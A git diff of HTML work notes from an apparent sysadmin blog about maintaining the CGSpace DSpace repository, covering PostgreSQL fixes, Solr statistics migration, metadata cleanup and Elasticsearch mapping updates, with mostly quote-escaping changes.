<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(192921) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(192921) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);&#39;
UPDATE 1
</code></pre><ul>
<li>After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:</li>
@ -794,8 +794,8 @@ Total number of bot hits purged: 8174
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&quot;RTB website BOT&quot;
$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
$ curl -s &#39;http://localhost:8083/solr/statistics/update?softCommit=true&#39;
</code></pre><ul>
<li>And I saw three hits in Solr with <code>isBot: true</code>!!!
<ul>
@ -817,9 +817,9 @@ $ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;
$ dspace metadata-export -f /tmp/cgspace.csv
$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
</code></pre><ul>
<li>Then I went through all center subjects looking for &ldquo;WOMEN&rdquo; or &ldquo;GENDER&rdquo; and checking if they were missing the associated AGROVOC subject
<ul>
@ -848,7 +848,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&amp;size=10000&amp;q=*:*' &gt; /tmp/affiliations.json
<pre tabindex="0"><code>$ http &#39;http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&amp;size=10000&amp;q=*:*&#39; &gt; /tmp/affiliations.json
</code></pre><ul>
<li>Then I decided to try a different approach and I adjusted my <code>convert-mapping.py</code> script to re-consider some replacement patterns with acronyms from the original AReS <code>mapping.json</code> file to hopefully address some MEL to CGSpace mappings
<ul>
@ -897,8 +897,8 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
$ git checkout origin/6_x-dev-atmire-modules
$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
$ sudo su - postgres
$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
$ psql dspacetest -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ exit
$ sudo systemctl stop tomcat7
$ cd dspace/target/dspace-installer
@ -911,7 +911,7 @@ $ sudo systemctl start tomcat7
</code></pre><ul>
<li>Then I started processing the Solr stats one core and 1 million records at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
@ -920,8 +920,8 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
</code></pre><ul>
<li>After the fifth or so run I got this error:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -945,7 +945,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Then I restarted the <code>solr-upgrade-statistics-6x</code> process, which apparently had no records left to process</li>
<li>I started processing the statistics-2019 core&hellip;
@ -967,8 +967,8 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;id:/.+-unmigrated/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;id:/.+-unmigrated/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><ul>
<li>I restarted the process and it crashed again a few minutes later
<ul>
<li>I increased the memory to 4096m and tried again</li>
@ -976,7 +976,7 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Then I started processing the statistics-2017 core&hellip;
<ul>
@ -984,7 +984,7 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8083/solr/statistics-2017/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary &quot;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&quot;
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8083/solr/statistics-2017/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
</code></pre><ul>
<li>Also I purged 2.7 million unmigrated records from the statistics-2019 core</li>
<li>I filed an issue with Atmire about the duplicate values in the <code>owningComm</code> and <code>containerCommunity</code> fields in Solr: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839</a></li>
@ -1011,7 +1011,7 @@ java.lang.OutOfMemoryError: Java heap space
</li>
</ul>
<pre tabindex="0"><code>$ dspace metadata-export -f /tmp/cgspace.csv
$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
$ csvcut -c &#39;id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]&#39; /tmp/cgspace.csv &gt; /tmp/cgspace-subjects.csv
</code></pre><ul>
<li>I sanity checked the CSV in <code>csv-metadata-quality</code> after exporting from OpenRefine, then applied the changes to 453 items on CGSpace</li>
<li>Skype with Peter and Abenet about CGSpace Explorer (AReS)
@ -1043,7 +1043,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
<pre tabindex="0"><code>$ ./create-mappings.py &gt; /tmp/elasticsearch-mappings.txt
$ ./convert-mapping.py &gt;&gt; /tmp/elasticsearch-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &quot;Content-Type: application/json&quot; --data-binary @/tmp/elasticsearch-mappings.txt
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @/tmp/elasticsearch-mappings.txt
</code></pre><ul>
<li>After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up</li>
<li>I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontent container:</li>
@ -1088,16 +1088,16 @@ South Asia,Southern Asia
Africa South Of Sahara,Sub-Saharan Africa
North Africa,Northern Africa
West Asia,Western Asia
$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d
$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227 -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 92m14.294s
user 7m59.840s
sys 2m22.327s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 92m14.294s
</span></span><span style="display:flex;"><span>user 7m59.840s
</span></span><span style="display:flex;"><span>sys 2m22.327s
</span></span></code></pre></div><ul>
<li>I realized I had been using an incorrect Solr query to purge unmigrated items after processing with <code>solr-upgrade-statistics-6x</code>&hellip;
<ul>
<li>Instead of this: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
@ -1115,17 +1115,17 @@ sys 2m22.327s
</li>
<li>Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:</li>
</ul>
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
COPY 6357
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
COPY 730
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
COPY 71748
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.publisher&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.publisher&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
COPY 3882
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.source&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.source&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
COPY 3684
dspace=&gt; \COPY (SELECT DISTINCT text_value as &quot;dc.relation.ispartofseries&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.relation.ispartofseries&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
COPY 5598
</code></pre><ul>
<li>I noticed there are still some mapping for acronyms and other fixes that haven&rsquo;t been applied, so I ran my <code>create-mappings.py</code> script against Elasticsearch again
@ -1134,12 +1134,12 @@ COPY 5598
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ grep -c '&quot;find&quot;' /tmp/elasticsearch-mappings*
<pre tabindex="0"><code>$ grep -c &#39;&#34;find&#34;&#39; /tmp/elasticsearch-mappings*
/tmp/elasticsearch-mappings2.txt:350
/tmp/elasticsearch-mappings.txt:1228
$ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | wc -l
$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | wc -l
1578
$ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | sort | uniq | wc -l
$ cat /tmp/elasticsearch-mappings* | grep -v &#39;{&#34;index&#34;:{}}&#39; | sort | uniq | wc -l
1578
</code></pre><ul>
<li>I have no idea why they wouldn&rsquo;t have been caught yesterday when I originally ran the script on a clean AReS with no mappings&hellip;
@ -1148,10 +1148,10 @@ $ cat /tmp/elasticsearch-mappings* | grep -v '{&quot;index&quot;:{}}' | sort | u
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/elasticsearch-mappings* &gt; /tmp/new-elasticsearch-mappings.txt
$ curl -XDELETE http://localhost:9200/openrxv-values
$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> --data-binary @/tmp/new-elasticsearch-mappings.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/elasticsearch-mappings* &gt; /tmp/new-elasticsearch-mappings.txt
</span></span><span style="display:flex;"><span>$ curl -XDELETE http://localhost:9200/openrxv-values
</span></span><span style="display:flex;"><span>$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> --data-binary @/tmp/new-elasticsearch-mappings.txt
</span></span></code></pre></div><ul>
<li>The latest indexing (second for today!) finally finshed on AReS and the countries and affiliations/crps/journals all look MUCH better
<ul>
<li>There are still a few acronyms present, some of which are in the value mappings and some which aren&rsquo;t</li>
@ -1160,7 +1160,7 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H <span style="co
<li>Lower case some straggling AGROVOC subjects on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 123
dspace=# COMMIT;
</code></pre><ul>
@ -1198,10 +1198,10 @@ $ dspace community-filiator --set --parent 10568/83389 --child 10568/56924
</code></pre><ul>
<li>Then I did a test to apply the corrections and deletions on my local DSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -t 'correct' -m 55
$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p 'fuuu' -f dc.source -m 55
$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -t correct -m 39
$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p 'fuuu' -f dc.publisher -m 39
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -t &#39;correct&#39; -m 55
$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -m 55
$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -t correct -m 39
$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -m 39
</code></pre><ul>
<li>I will wait to apply them on CGSpace when I have all the other corrections from Peter processed</li>
</ul>
@ -1214,8 +1214,8 @@ $ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace
</li>
<li>Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct' -m 29
$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct&#39; -m 29
$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
</code></pre><ul>
<li>I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:</li>
</ul>

View File

@ -32,7 +32,7 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,8 +150,8 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -t 'correct' -m 211
$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t &#39;correct&#39; -m 211
$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><ul>
<li>Then I started a Discovery re-index on CGSpace:</li>
</ul>
@ -191,7 +191,7 @@ sys 2m26.931s
<li>Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:</li>
</ul>
<pre tabindex="0"><code>dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 164
dspace=# COMMIT;
</code></pre><ul>
@ -314,8 +314,8 @@ $ git checkout origin/6_x-dev-atmire-modules
$ npm install -g yarn
$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package
$ sudo su - postgres
$ psql dspace -c 'CREATE EXTENSION pgcrypto;'
$ psql dspace -c &quot;DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');&quot;
$ psql dspace -c &#39;CREATE EXTENSION pgcrypto;&#39;
$ psql dspace -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
$ exit
$ rm -rf /home/cgspace/config/spring
$ ant update
@ -338,7 +338,7 @@ $ sudo systemctl start tomcat7
# pg_upgradecluster 9.6 main
# pg_dropcluster 9.6 main
# systemctl start postgresql
# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
</code></pre><ul>
<li>Then I ran all system updates and rebooted the server&hellip;</li>
<li>After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated</li>
@ -372,13 +372,13 @@ Error sending email:
<li>I copied the <code>mail.extraproperties = mail.smtp.starttls.enable=true</code> setting from the old DSpace 5 <code>dspace.cfg</code> and now the emails are working</li>
<li>After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
</code></pre><ul>
<li>After about 6,000,000 records I got the same error that I&rsquo;ve gotten every time I test this migration process:</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -407,7 +407,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
<ul>
<li>There are almost 1,500 locks:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
1494
</code></pre><ul>
<li>I sent a mail to the dspace-tech mailing list to ask for help&hellip;
@ -454,8 +454,8 @@ java.lang.OutOfMemoryError: Java heap space
</ul>
</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
@ -486,7 +486,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
<ul>
<li>There are over 2,000 locks:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
2071
</code></pre><h2 id="2020-11-18">2020-11-18</h2>
<ul>
@ -603,7 +603,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
</ul>
</li>
